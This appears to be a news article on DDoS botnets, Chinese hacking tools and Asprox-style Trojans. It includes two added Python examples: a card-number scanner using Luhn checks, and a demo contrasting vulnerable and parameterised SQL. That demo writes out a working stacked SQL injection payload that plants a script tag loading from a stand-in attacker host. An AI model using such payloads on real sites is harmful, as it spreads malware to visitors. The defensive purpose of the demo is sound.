Virtual battleground attacks Hezbollah's soft underbelly
Software used to take down Web sites is more accessible and dangerous than ever before.
Last week, while trying out attack tools developed by Chinese hackers, the Israeli network security company Applicure brought down the Hezbollah Web site (hizbollah.tv) using no more than 10 bots, the term for computers taken over and remotely controlled by hackers.
Reports of hackers taking out Web sites by bombarding them with massive amounts of traffic commonly appear in the news media. But it is often hard to gauge both the magnitude of the phenomenon and the ease with which even laymen can use the tools already circulating on the Web.
Attacks aimed at bringing down Web sites are known as denial of service (DoS) or distributed denial of service (DDoS) attacks, and they make use of botnets: large networks of computers belonging to unsuspecting users, hijacked by hackers with viruses and Trojan horses. According to China's CERT (Computer Emergency Response Team), the threat to China's domestic network grew twentyfold in 2007.
One of the most surprising things about the software used to take down the Lebanese militant organization's site is its interface, which is light years away from the common image of hackers wrestling with complex code. The interface is very accessible and is clearly meant for everyday users rather than veteran programmers.
The software lets the user choose the type of attack, its speed, and the number of computers to be used in order to bring down the Web site's servers.
Applicure's South Korean partners say the price of using software of the kind that brought down the Hezbollah site starts at about $260 a year for a small number of bots. Having 1,000 bots at your disposal can bring the price up to $100 a month.
The hacker, or group of hackers, who created the software refused to speak to Haaretz. But the amounts of money such hackers can make were made public on Darkvisitor.com, Scott Henderson's blog specializing in Chinese hackers. According to that report, a virus writer can make up to a million yuan, about $150,000, a year, while a virus-spreading group can reach an income of about $1.5 million a year.
Applicure's interest in South Korea is no accident. When the company offered a free version of its software, an especially high number of downloads originated in South Korea. The picture became clear after Haaretz contacted some of the downloaders: South Korea is a favorite target of Chinese hackers because of its highly developed Internet infrastructure, the kind Israel can only dream of, which gives an average household connection a speed of around 40 megabytes per second. Online games, which bring in large sums of money, are a highly developed industry in Asia in general and in South Korea in particular.
Security expert Raviv Raz, who recently returned from South Korea, where he also visited the labs of the National Center for Information Security, says the purpose of the attacks is often blackmail. "When a company which specializes in online gaming has its lines cut, a huge loss follows. Even if it's only for one day," he said.
So South Korea has become a kind of Internet equivalent of the canary in the coal mine. Just as canaries served as sensors warning of a lack of oxygen or the presence of toxic gases, South Korea serves as an early-warning sensor for hacker attacks.
In the West, casino sites are the worst hit. The attacks are carried out with unfamiliar twists added to familiar break-in software, the most famous of which is Asprox. The purpose of these programs is to infect as many users as possible with Trojan horses built for a single aim: to search every file for number sequences that look like credit card numbers or major bank account numbers, and to steal them.
Along the way the Trojan horses can be fitted with all kinds of extras, from logging keystrokes to peeping through the webcam.
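The "number sequences which look like credit card numbers" that such Trojans hunt for can be picked out of a file with a short digit-run regex plus the Luhn mod-10 check, which is also exactly the check a data-loss-prevention scanner or an incident responder's triage script uses to find card data that should not be sitting in a dump. The following is an added example written for this article; it is not code from the Trojans described, from Asprox or from Applicure, and the sample text it scans is constructed here:

```python
import re

# Constructed sample text (not from the article): card-like strings mixed with
# look-alikes that a naive digit scan would also flag.
SAMPLE_TEXT = """order 4111 1111 1111 1111 shipped
phone 1234567890123456 is not a card
amex 3782 822463 10005 ok
visa 4012-8888-8888-1881 ok
serial 1234-5678-9012-3456 no
"""

# 13-19 digits, optionally separated by spaces or dashes, not embedded in a
# longer run of digits.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check: every real card number passes, most random digit runs do not."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_like(text: str) -> list:
    """Return the digit strings in `text` that have card length and pass Luhn."""
    hits = []
    for m in CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append(digits)
    return hits


def mask(digits: str) -> str:
    """Report form that keeps only the last four digits, so the scan itself does not leak cards."""
    return "*" * (len(digits) - 4) + digits[-4:]


if __name__ == "__main__":
    for d in find_card_like(SAMPLE_TEXT):
        print(mask(d))
```

Of the five candidates in the sample, only the three that pass Luhn are reported; the two sixteen-digit look-alikes fall out. The same two-stage filter is the cheapest way to scan a suspected exfiltration archive for what an Asprox-style Trojan would have collected.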
According to Raz, the bots use SQL injection; in other words, they inject malicious code into the most legitimate sites conceivable. For example, one of the better-known break-ins last year targeted the Chinese Yahoo site.
David Alush adds: "It's an automatic intrusion into the Web site's database. The virus checks the entire site, and if that database is linked to dozens more sites, then those are corrupted as well." In other words, every part of every one of those Web sites will carry the malicious code, which will keep trying to download itself onto users' computers.
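The mechanism Raz and Alush describe, an automated SQL injection that leaves a script tag in every page stored in the database so that the site itself serves the Trojan downloader, is easiest to see side by side with the one-line fix. The following is an added example, not code from the attack tools, from Asprox or from Applicure: the schema, the visit-logging handler and the hostile Referer header are all constructed here, attacker.invalid is a hypothetical host, and Python's `executescript` stands in for a driver and database combination that accepts several statements in one call.

```python
import sqlite3

# Hypothetical attacker host (not from the article); this tag is what the
# injected UPDATE leaves in every row.
INJECTED_TAG = '<script src="http://attacker.invalid/a.js"></script>'

# Constructed payload carried in an HTTP Referer header: closes the string
# literal and the INSERT, stacks an UPDATE that appends the tag to every page
# body, then comments out whatever the application appends afterwards.
MALICIOUS_REFERER = "x'); UPDATE pages SET body = body || '" + INJECTED_TAG + "'; --"


def fresh_db():
    """Constructed sample schema: a content table plus a visit log."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE visits (id INTEGER PRIMARY KEY, page TEXT, referer TEXT);
        INSERT INTO pages (title, body) VALUES ('Home', '<p>Welcome</p>');
        INSERT INTO pages (title, body) VALUES ('News', '<p>Latest</p>');
    """)
    return conn


def log_visit_vulnerable(conn, page, referer):
    """Builds the statement by string concatenation and runs it through
    executescript, which accepts stacked statements. That stands in for a
    driver/database pair that allows several statements per call."""
    sql = "INSERT INTO visits (page, referer) VALUES ('" + page + "', '" + referer + "');"
    conn.executescript(sql)


def log_visit_safe(conn, page, referer):
    """Same insert with bound parameters: the referer is data, never SQL."""
    conn.execute("INSERT INTO visits (page, referer) VALUES (?, ?)", (page, referer))
    conn.commit()


def infected_pages(conn):
    """Titles of pages whose body now carries a script tag."""
    rows = conn.execute(
        "SELECT title FROM pages WHERE body LIKE '%<script%' ORDER BY id").fetchall()
    return [r[0] for r in rows]


def demo():
    """Run the same hostile header through both handlers on fresh databases."""
    out = {}
    conn = fresh_db()
    log_visit_vulnerable(conn, "Home", MALICIOUS_REFERER)
    out["vulnerable"] = infected_pages(conn)

    conn = fresh_db()
    log_visit_safe(conn, "Home", MALICIOUS_REFERER)
    out["safe"] = infected_pages(conn)
    out["stored_safely"] = (
        conn.execute("SELECT referer FROM visits").fetchone()[0] == MALICIOUS_REFERER
    )
    return out


if __name__ == "__main__":
    print(demo())
```

With the concatenated statement, one request rewrites both pages (and, on a shared database, every other site that reads from it), which is the "dozens more sites" effect Alush describes. With bound parameters the same header is stored as an inert string. Escaping page content on output is a second, independent layer; it limits the damage but does not stop the database from being modified.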
Both Alush and Raz speak of exponential growth in the number of infected Web sites, and various reports on the growth of Chinese botnets support that estimate. According to one such report, China was second only to the U.S. in the number of bot-driven attacks.